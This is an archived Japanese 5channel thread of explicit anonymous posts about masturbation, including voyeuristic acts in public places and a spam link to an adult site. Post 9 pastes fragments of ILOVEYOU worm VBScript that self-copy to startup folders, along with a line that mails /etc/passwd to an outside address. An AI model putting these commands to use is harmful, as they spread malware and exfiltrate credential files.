5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(;´Д`)ハァハァ〜せんずりこいてマスか?

1 :名無しさん@お腹いっぱい。:2005/05/28(土) 00:36:56
私は週2です。

2 :名無しさん@お腹いっぱい。:2005/05/28(土) 02:02:08
2ゲットの私は月1です。






しない日だが。

3 :名無しさん@お腹いっぱい。:2005/05/28(土) 08:15:20

絶倫やね…

4 :名無しさん@お腹いっぱい。:2005/05/28(土) 09:10:16
漏れもしてる。
週2ペース。
だいたいホール。
もしくは左手。

5 :名無しさん@お腹いっぱい。:2005/05/28(土) 15:38:28
(´・ω・) カワイソス 

6 :名無しさん@お腹いっぱい。:2005/05/28(土) 22:12:26

今日もこきます。

7 :名無しさん@お腹いっぱい。:2005/05/29(日) 00:30:39
週7

8 :名無しさん@お腹いっぱい。:2005/05/29(日) 09:18:13
>>7
(;´Д`)
アンタ エロイ!もとい、エライな〜。
でも、ネタ切れにならないの?

9 :名無しさん@お腹いっぱい。:2005/05/29(日) 10:37:58
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



10 :名無しさん@お腹いっぱい。:2005/05/29(日) 23:46:44

↑ワンパターンせんずり小僧

11 :名無しさん@お腹いっぱい。:2005/05/30(月) 08:05:36
こいてから会社に行きマス

12 :名無しさん@お腹いっぱい。:2005/05/30(月) 09:36:01
二十歳くらいの男の子ってどのくらいのペースでシコるんですか?

13 :名無しさん@お腹いっぱい。:2005/05/30(月) 09:48:16
>>12
1時間おき。

14 :名無しさん@お腹いっぱい。:2005/05/30(月) 23:18:46
馬鹿〜ん(^_^;)

15 :名無しさん@お腹いっぱい。:2005/05/31(火) 09:21:12
>>12
『洗濯屋ケンちゃん』『雪国』『姉妹坂』『シークレット』で4連発

それが今では……orz

16 :名無しさん@お腹いっぱい。:2005/05/31(火) 09:52:36
>>15
懐かしいな。
「少女B」ってのもあったぞ。
男優が竜助に似てた。

17 :名無しさん@お腹いっぱい。:2005/05/31(火) 23:21:45
今日もともちゃんで
せんずりこいて寝ます。

18 :名無しさん@お腹いっぱい。:2005/06/01(水) 14:59:59

せんずりマンセ〜

19 :名無しさん@お腹いっぱい。:2005/06/01(水) 16:00:00
嫁が寝てるときにパンティーの割れ目に鼻を持って行き
ニオイを嗅ぎながらオナニーをするのが好きです。
嫁は気づいているようですが、知らないフリをしてくれています。

20 :名無しさん@お腹いっぱい。:2005/06/02(木) 01:52:42
せんずり(^O^)/

21 :名無しさん@お腹いっぱい。:2005/06/02(木) 13:10:52
男は基本的に結婚してるか否かにかかわらずセンズリは皆していると思う。

セックスとは別物なんですよw

22 :名無しさん@お腹いっぱい。:2005/06/02(木) 14:48:14
センズリだと早くイケルのですが、嫁とだとなかなかイケないのはなぜ?

23 :名無しさん@お腹いっぱい。:2005/06/02(木) 15:20:37
右手に勝る名器はありませんね

24 :名無しさん@お腹いっぱい。:2005/06/02(木) 15:29:20
>>22
嫁とか…
それはそれで、また早すぎるのも問題が出そうなわけで…

25 :名無しさん@お腹いっぱい。:2005/06/02(木) 19:40:38
おれは早漏で悩んでます

26 :名無しさん@お腹いっぱい。:2005/06/03(金) 23:57:42
♪(*'-^)-☆

27 :名無しさん@お腹いっぱい。:2005/06/04(土) 01:05:17
>>23
漏れは左手。
もしくはオナホ。
これからオナホに発射してネルス

28 :名無しさん@お腹いっぱい。:2005/06/04(土) 04:42:32
ハァ〜?

29 :名無しさん@お腹いっぱい。:2005/06/04(土) 15:20:22
みなさんは本気でオナニーよりもSEXの方が楽しいと信じてるんですが?

30 :名無しさん@お腹いっぱい。:2005/06/04(土) 16:50:50
クリに手が・・・アツ、アツ・・

31 :名無しさん@お腹いっぱい。:2005/06/04(土) 16:51:32
あほか!

32 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:52:48

http://bubble3.2ch.net/test/read.cgi/cafe40/1116929720/l50

↓脳内妄想、知ったかの馬鹿悦がまたまた赤っ恥! ww


241 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:18:44
>>208

>それに鳴門の鯛は明石の漁師が獲りに行く鯛であって、昔で言う「明石の鯛」とは別物であると、俺は考えております。


悦司さんとやら・・・
淡路在住の俺が一言、言うておきますが、
俺の伯父は淡路島で現役の漁師をやってる。
明石近海の瀬戸内で獲れる桜鯛は今も昔も明石の鯛である・・・と言うてるぞ。
昔ほどではないが今でも結構な数が揚がる言うてるよ。

まして、アンタの言うように遠洋物の鯛を明石の鯛として市場に出すなんて、
詐欺行為や言うてますよ。

アンタの会社はニセモンを明石の鯛言うて売ってますのんか?

あまり確信の無いことは書かん方がよろしいんちゃいますか??

そこでお願い。
アンタのレスはこのスレにまったく合わん。
もう荒らすのはやめてくれや。
二度と来んといてくれ。 頼んますわ。 ええな!



33 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:53:01
あほか!

34 :名無しさん@お腹いっぱい。:2005/06/04(土) 18:20:51
アソコに人参を突っ込んだまま亡くなられたご婦人の写真が
医学書?に掲載されています。
我々の年代ですと、コトの最中に脳溢血ということもそろそろ・・・
つまり、女装して頭にぱんていを被って・・・などは控えるべきでありましょう。

35 :名無しさん@お腹いっぱい。:2005/06/04(土) 22:32:28
せんずりこいて寝ます。

36 :名無しさん@お腹いっぱい。:2005/06/04(土) 23:11:57
> (;´Д`)ハァハァ〜せんずりこいてマスか?

今、書き込みながらシゴイテいまつ(;´Д`)ハァハァ

37 :名無しさん@お腹いっぱい。:2005/06/06(月) 06:27:06


シコシコ〜

38 :名無しさん@お腹いっぱい。:2005/06/06(月) 09:24:23
>>12
亀でスマヌが
漏れの場合、
毎日2回はコイていた。
その後、女にモテる事なくほとんど毎日していた。
結果、この年になってedになり、
現在薬のお世話にならないと立たなくなってしまったw

39 :名無しさん@お腹いっぱい。:2005/06/06(月) 21:50:36
∧ ∧
(*゚ー゚)
140■ 名無しさん@お腹いっぱい。 ■ 
ワシ一日一食だよ、中身はごく普通
今日は朝からピンサロ50分コースで2回発射
かえってからもうひとカキ、、多分通算1万回以上、20gくらい
だしてるハズ。
DATE:2005/05/28(土) 19:57:54


40 :名無しさん@お腹いっぱい。:2005/06/07(火) 09:16:52

せんずりこいて寝ます。

41 :名無しさん@お腹いっぱい。:2005/06/07(火) 09:22:49
寝起きに一発コキました。

42 :名無しさん@お腹いっぱい。:2005/06/07(火) 21:51:21
せんずりはコク
マスはかく
オナニは、、、

43 :名無しさん@お腹いっぱい。:2005/06/07(火) 21:54:17
するしかないのでは?

44 :名無しさん@お腹いっぱい。:2005/06/07(火) 22:25:34
みんなぁ、どこでこいてますか〜?
おれは〜さいきんいがいなばしょでこいてます。



45 :名無しさん@お腹いっぱい。:2005/06/08(水) 04:46:50





墓地・・・

46 :名無しさん@お腹いっぱい。:2005/06/08(水) 10:03:54
漏れはエロビ、DVD等が売られている自販機小屋。
中でチンポ出して自販機見ながらしごいてる。
逝く時は自販機にぶっかけ。

下のコンクリ見るといろんなシミがあるんだよな。
漏れだけじゃないってこったw


47 :名無しさん@お腹いっぱい。:2005/06/08(水) 10:36:10
あの時コイてたのは、お前か?
お前がいたから買えなかったじゃねーかよ!

48 :名無しさん@お腹いっぱい。:2005/06/09(木) 11:40:16
ちがうがなぁ

(;´Д`)ハァハァ…

49 :名無しさん@お腹いっぱい。:2005/06/09(木) 12:30:48
>>44
答えキボン。


50 :44:2005/06/09(木) 21:05:22
私にとっては、とってもハイセンスな意外な場所がでましたので、
私の意外な場所は当たり前な場所だったのかも、と少し引きました。

漫画喫茶併設の仕切られたネットブースでこいてましたが、
俺って、まだまだな44歳でした。


51 :名無しさん@お腹いっぱい。:2005/06/10(金) 01:08:39



ぴゅ〜

52 :名無しさん@お腹いっぱい。:2005/06/10(金) 06:37:25
単車でツーリング時、人気のない
山道になるとシコシコシコ、、、うっ、、

ミーンミーンミーン(蝉の声)

53 :名無しさん@お腹いっぱい。:2005/06/10(金) 12:16:17
おとといそしてゆうべ

54 :名無しさん@お腹いっぱい。:2005/06/10(金) 12:17:27
今からトイレにむかいます。

55 :名無しさん@お腹いっぱい。:2005/06/10(金) 12:18:19
>>44
歩道橋のまん中あたり

56 :名無しさん@お腹いっぱい。:2005/06/11(土) 03:29:31



( ̄〇 ̄;)シコシコ


57 :名無しさん@お腹いっぱい。:2005/06/11(土) 06:52:25
休日の朝の楽しみです。

58 :名無しさん@お腹いっぱい。:2005/06/11(土) 08:36:54
今、抜け殻状態です、また寝る

59 :名無しさん@お腹いっぱい。:2005/06/11(土) 22:11:46
毎朝6時頃からmpgみて、、、、

60 :名無しさん@お腹いっぱい。:2005/06/11(土) 22:16:30
( *´)・ ω ・(`* )親指とひとさし指だけでこいてマス。

61 :名無しさん@お腹いっぱい。:2005/06/11(土) 22:32:54
おれは黒いフィルム貼った車の中でせんずりしてます。
内側からは見れて外側からは見られないので、若いお姉ちゃんが横を通る時、
テンコ立ててやってます。

62 :名無しさん@お腹いっぱい。:2005/06/12(日) 05:04:03






スッキリ

63 :名無しさん@お腹いっぱい。:2005/06/13(月) 05:12:24
(^O^)

64 :名無しさん@お腹いっぱい。:2005/06/13(月) 05:39:40
硬質の方もこいてらっしゃるのでしょうか。

65 :名無しさん@お腹いっぱい。:2005/06/13(月) 11:38:09
会社のトイレで2日に1回はコイテル。

66 :名無しさん@お腹いっぱい。:2005/06/13(月) 13:57:14
おまいもうその事皆にバレてるぞ。

67 :名無しさん@お腹いっぱい。:2005/06/13(月) 15:32:17
みんな知ってるジジツw

68 :名無しさん@お腹いっぱい。:2005/06/13(月) 15:33:40
この前、運転中にこいてたら事故しそうになり本当に逝くところでした。

69 :名無しさん@お腹いっぱい。:2005/06/13(月) 16:24:06
昨日、嫁さんに手で抜いてもらいました。
出そうになる前で、もっと強く握ってもらったら、
とーっても、気持ちよく出せました。ありがとう。

70 :名無しさん@お腹いっぱい。:2005/06/13(月) 17:46:24
↑仲がイイですね

71 :名無しさん@お腹いっぱい。:2005/06/13(月) 20:05:48
寝る前のドピュッが毎日の習慣になってる。
ぐっすり眠れるんだ。
朝立ちに乗じてやる時もある。

さ、今日もオナニーして寝よ。

72 :名無しさん@お腹いっぱい。:2005/06/13(月) 20:17:54
ティッシュはトイレに流しちゃいけないってホントか?

73 :名無しさん@お腹いっぱい。:2005/06/13(月) 22:08:19
>>68
運転中のせんずり、尺八は危険なので止めましょう。

74 :名無しさん@お腹いっぱい。:2005/06/13(月) 22:32:11
尺八はハンドルから手を外すことないからOK!
せんずりは、テッシュで押さえるのときが危険!NG!!

75 :名無しさん@お腹いっぱい。:2005/06/14(火) 00:50:35
(^O^)/ イェ〜ィ

76 :名無しさん@お腹いっぱい。:2005/06/14(火) 03:48:03
>>74
尺八は逝く時にビクッとして、急ブレーキやアクセルを踏み込む事が良く
あります。又、あさっての方向に急ハンドルを切ってしまう事も多々有ります。
両手がハンドル上にあると言えども運転中の尺八はやはり事故の元です。
極力避ける様、心掛けましょう。

77 :名無しさん@お腹いっぱい。:2005/06/14(火) 05:52:55
朝から二発こきました

78 :名無しさん@お腹いっぱい。:2005/06/14(火) 07:15:24
今から二発コキます。。

79 :名無しさん@お腹いっぱい。:2005/06/14(火) 07:20:10
だだ今、鱒ってマツ・・・・・・
(;´Д`)ハァハァ…  

80 :名無しさん@お腹いっぱい。:2005/06/14(火) 08:16:58
やっぱり、鱒、二発が限界でした・・・
年齢は取りたくない罠・・・(;´Д`)ハァハァ

81 :名無しさん@お腹いっぱい。:2005/06/15(水) 10:57:02


空撃ち

82 :名無しさん@お腹いっぱい。:2005/06/15(水) 11:01:40
なんか寝起きが悪い。。。。orz


83 :名無しさん@お腹いっぱい。:2005/06/15(水) 17:21:00
(^O^)/おはよ〜

84 :名無しさん@お腹いっぱい。:2005/06/15(水) 20:02:55


また、せんずりこいちゃったo(^-^)o

85 :名無しさん@お腹いっぱい。:2005/06/15(水) 20:03:59




              ノ
       __     /
      /⌒ ヽ  /        /
      (     )'゙ヽ.     _/
.    /iー-‐'"i    ,;   /
  i ! ( ヽ.    )  ノ/ .:/
    (\.゙ヽ_(_/,イ/
  i ! (\\_,_)' ノ
    (\\_,_,)'
  i !  l ,i\ ヽ、 !  ちんちん
     し'


86 :名無しさん@お腹いっぱい。:2005/06/16(木) 00:22:12


3… ぴゅ〜

87 :名無しさん@お腹いっぱい。:2005/06/16(木) 00:51:39
最近めっきり飛びが悪いですね

88 :名無しさん@お腹いっぱい。:2005/06/16(木) 06:27:07


=Э‥ドロ〜ッ

89 :名無しさん@お腹いっぱい。:2005/06/16(木) 23:32:20
飯島直子さんで
せんずりこいて寝ます。

90 :名無しさん@お腹いっぱい。:2005/06/16(木) 23:54:18
運転中の尺八はよくない罠
逝く瞬間にビクッとしてその拍子に事故ってしまって、
その時のショックで女が男のチンポ噛み千切ってしまったって話よく聞くよ。

91 :名無しさん@お腹いっぱい。:2005/06/17(金) 00:07:12
マジ(・_・;)

92 :名無しさん@お腹いっぱい。:2005/06/17(金) 07:22:49
朝のせんずりもイイもんだ

93 :名無しさん@お腹いっぱい。:2005/06/17(金) 07:54:52
濃毛泳虎を昨夜テレビで見てムラムラしてきたから千ずり、コイて寝たよ。

94 :名無しさん@お腹いっぱい。:2005/06/17(金) 08:02:33
電車の中でコキたくなります。

95 :名無しさん@お腹いっぱい。:2005/06/17(金) 19:45:13
趣味はセンズリっす。

96 :名無しさん@お腹いっぱい。:2005/06/17(金) 21:00:05
オレもせんずり!

97 :名無しさん@お腹いっぱい。:2005/06/17(金) 22:21:06
フィニッシュの時、上司の顔が浮かんだ事あります?

98 :名無しさん@お腹いっぱい。:2005/06/17(金) 22:39:00
ぺぺとかのローション使ってせんずりしたら、もうやめられないって聞くよ。

99 :名無しさん@お腹いっぱい。:2005/06/17(金) 22:55:26
>>98
やめられない。
実生活でもローション無しでは逝けないティムになってしまった。
オナホ+ローションで最強。

100 :名無しさん@お腹いっぱい。:2005/06/18(土) 00:27:35
>>97
ってか、上司がおかずなんだが

101 :名無しさん@お腹いっぱい。:2005/06/18(土) 01:45:41
せんずりの語源を言って美代。

102 :名無しさん@お腹いっぱい。:2005/06/18(土) 02:12:03
千回シコシコずりずり〜


(;´Д`)ハァハァ…

103 :名無しさん@お腹いっぱい。:2005/06/18(土) 03:45:17
俺が住んでる地方では「へんずり」をこく と表現するのだが皆さんどうでつか?

104 :名無しさん@お腹いっぱい。:2005/06/18(土) 17:47:16
赤液出たことある?

105 :名無しさん@お腹いっぱい。:2005/06/18(土) 18:14:17
毎日やっているとクセになるんだが、かなり擦らないと起たない

106 :名無しさん@お腹いっぱい。:2005/06/18(土) 19:56:21
俺は、Hを一回したら2回目からひとりでする。
乳首を舐めさせながらシコシコしている。
逝きそうになると、SEIEKIを口で受け止めさせて飲み干させる。

107 :名無しさん@お腹いっぱい。:2005/06/18(土) 20:27:01
40過ぎてアイドルDVDで抜く私はアホですか?

108 :名無しさん@お腹いっぱい。:2005/06/18(土) 21:12:50
>>104
出た事あるよ。
オナホ洗わずに数日そのまま使ってたら尿道から
ばい菌入って血の混ざった製紙が出た。
いつも白いのが出るのに赤いのが出るとビビるよ、マジで。
ビビッたね、俺は。
俺はビビッたね。

109 :練乳:2005/06/18(土) 22:30:38
最近、液が薄くなったように感汁

110 :カルピス:2005/06/19(日) 00:05:12
漏れは飛距離が縮んだよ

111 :名無しさん@お腹いっぱい。:2005/06/20(月) 00:24:33

(>_<) あちゃー!

112 :名無しさん@お腹いっぱい。:2005/06/20(月) 05:46:56
今日はせんずりこかないで風俗店で手こぎしてもらいます!

113 :名無しさん@お腹いっぱい。:2005/06/20(月) 07:28:05
妄想でよくコキます。自分でシュチュエーション考えれば誰でも想いのままです。

114 :名無しさん@お腹いっぱい。:2005/06/20(月) 08:18:49
眠れない時はついつい手がチンポに行ってしまう。
そしてやおら起き上がりエロ本見て至極。

昨夜もそんな夜だった。

115 :名無しさん@お腹いっぱい。:2005/06/20(月) 08:20:48
妻に毎晩、手で抜いてもらってます・・・(;´Д`)…ハァハァ

116 :名無しさん@お腹いっぱい。:2005/06/20(月) 08:22:23
嫁さんとセクースはしないのでつか?

117 :名無しさん@お腹いっぱい。:2005/06/20(月) 09:05:49
>>116
>>115の妻は妊娠中なのでは?

118 :43:2005/06/20(月) 10:00:28
あーなるほど!

119 :練乳:2005/06/20(月) 11:01:15
今朝、ひとりでしたぞ!なぜか、液がでなかった、、、。

120 :名無しさん@お腹いっぱい。:2005/06/20(月) 19:17:31
便所で立ってコクとイク時、腰が抜けます。

121 :名無しさん@お腹いっぱい。:2005/06/20(月) 20:32:49

いっぱい出たよォー(^-^)/

122 :名無しさん@お腹いっぱい。:2005/06/20(月) 20:35:38
飲みたいよ〜(^o^)/

123 :名無しさん@お腹いっぱい。:2005/06/20(月) 20:40:05
>>120
わかる。
逝く時クラクラッとめまいするよな。

124 :名無しさん@お腹いっぱい。:2005/06/20(月) 22:06:23

低血圧だろ?

125 :名無しさん@お腹いっぱい。:2005/06/21(火) 00:58:10
いや、
高血圧だが?

126 :名無しさん@お腹いっぱい。:2005/06/21(火) 07:24:49
今朝、立ってました?

127 :名無しさん@お腹いっぱい。:2005/06/21(火) 08:08:42
勃ってました。

128 :名無しさん@お腹いっぱい。:2005/06/21(火) 09:11:39
これからこきマス

129 :名無しさん@お腹いっぱい。:2005/06/21(火) 17:23:30
今コイテます。

130 :名無しさん@お腹いっぱい。:2005/06/21(火) 17:26:02
俺をみろw

131 :名無しさん@お腹いっぱい。:2005/06/21(火) 17:34:01
やだ!

132 :名無しさん@お腹いっぱい。:2005/06/21(火) 17:49:16
おまえはもぅ逝っている。

133 :名無しさん@お腹いっぱい。:2005/06/21(火) 17:51:05
せんずりをへんずりと言ってました

134 :名無しさん@お腹いっぱい。:2005/06/21(火) 18:11:43
へんずりでもいい たくましく起ってほしい

135 :名無しさん@お腹いっぱい。:2005/06/21(火) 18:41:11
バイアグラって一日しか効かないのかなぁ?

136 :ゆうこ:2005/06/21(火) 18:45:37
アダルト業界初!!
素人参加型アダルトサイト!!
街頭...応募...様々な形で集めた女性素人モデルとあんなことやこんなことができる!!
今までにはなかった素人参加型アダルトサイト!!
もう欲求不満な人生は嫌だ!! 女に不自由な人生は嫌だ!!
こんな方は是非ご閲覧下さい。
http://hansokuwaza.net/feel/?adcode=zzweb1

137 :名無しさん@お腹いっぱい。:2005/06/21(火) 22:25:59
最近おかず不足で昔したエッチを思い出してコキます。ブスだけど体は最高だった。
柔らかく激しいフェラ。リズミカルな腰使い。ハッスルしたヨガリ声。あーまた立って来た


138 :名無しさん@お腹いっぱい。:2005/06/22(水) 00:35:03

今日もせんずりこいて寝ますよォー

139 :名無しさん@お腹いっぱい。:2005/06/22(水) 05:37:29
朝一でせんずりこいたよぉ〜


スッキリ

140 :名無しさん@お腹いっぱい。:2005/06/22(水) 07:29:23
女っていいよね。あの快感時間が長いんだって?

141 :名無しさん@お腹いっぱい。:2005/06/22(水) 07:45:35
みなさんに質問なんですが、コク時のねたはどーしてるんたですか?特に朝一でコクひと。

142 :練乳@コキコキくん:2005/06/22(水) 10:04:48
>>141
ネタはなんといっても嫁の浮気を妄想することですね。
それと朝一にも良くしますが、朝はイっても出ないときがありますね。

143 :名無しさん@お腹いっぱい。:2005/06/22(水) 18:53:06
自分は通勤電車で見かけた、いい女をマブタに焼き付けて妄想でエッチするスチュエーションを考えてコキます。妻の浮気もたまに妄想しますよ。

144 :名無しさん@お腹いっぱい。:2005/06/23(木) 00:13:44

ドロッと出たょ…

145 :名無しさん@お腹いっぱい。:2005/06/23(木) 00:16:31
漏れは毒なので
ペッドの下に無造作にエロ本置いている。


146 :名無しさん@お腹いっぱい。:2005/06/23(木) 00:23:56
ズボンの右ポケットに穴が開いていて、毎日通勤電車で手を入れて弄ってます

147 :名無しさん@お腹いっぱい。:2005/06/23(木) 01:08:45
変態ですね…

148 :名無しさん@お腹いっぱい。:2005/06/23(木) 07:51:52
視漢ってヤツですかね?毎日の通勤でよくします。罪ではないし、いい女を見付けては洋服の中身、下着を想像し色々妄想して寝る前にコキます。最近は洋服も薄着が多くなるしベストシーズンになりつつあるね。

149 :名無しさん@お腹いっぱい。:2005/06/23(木) 09:34:35
>>148
俺は歳なのかもう寝る前には、そんなの忘れちゃいます。

150 :名無しさん@お腹いっぱい。:2005/06/23(木) 12:17:28
最近は毎日こいてマス(^O^)/〜

151 :名無しさん@お腹いっぱい。:2005/06/23(木) 19:20:48
三日位ガマンすると想像力が増し、且つペニスも敏感になり、液量が増えます。また本番したあとは、その余韻で朝コキます。

152 :名無しさん@お腹いっぱい。:2005/06/23(木) 21:50:17
このRQで抜いてください。
つttp://image.blog.livedoor.jp/mm_manson/imgs/6/d/6d1b5c50.jpg

153 :名無しさん@お腹いっぱい。:2005/06/23(木) 23:27:22
(^_^;)キレイだなぁ…

154 :名無しさん@お腹いっぱい。:2005/06/23(木) 23:33:54
>>152
2回は抜けますね

155 :名無しさん@お腹いっぱい。:2005/06/24(金) 03:47:21
40歳になったらもうせんずりを扱いてはいけません。我慢しましょう。

156 :名無しさん@お腹いっぱい。:2005/06/24(金) 07:28:16
ハァハァでも自然に手がペニスをいじってしまう。

157 :名無しさん@お腹いっぱい。:2005/06/24(金) 08:05:15
「ペニスに死す」



158 :名無しさん@お腹いっぱい。:2005/06/24(金) 08:33:19
>>152

もう出る時間だったのに
一発いきました (=^^=) 。。

159 :名無しさん@お腹いっぱい。:2005/06/24(金) 09:44:08
レースクィーンカワイイねぇ…(^_^;)

160 :名無しさん@お腹いっぱい。:2005/06/24(金) 13:47:50
でわ、今から、一本抜いてきますね!

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)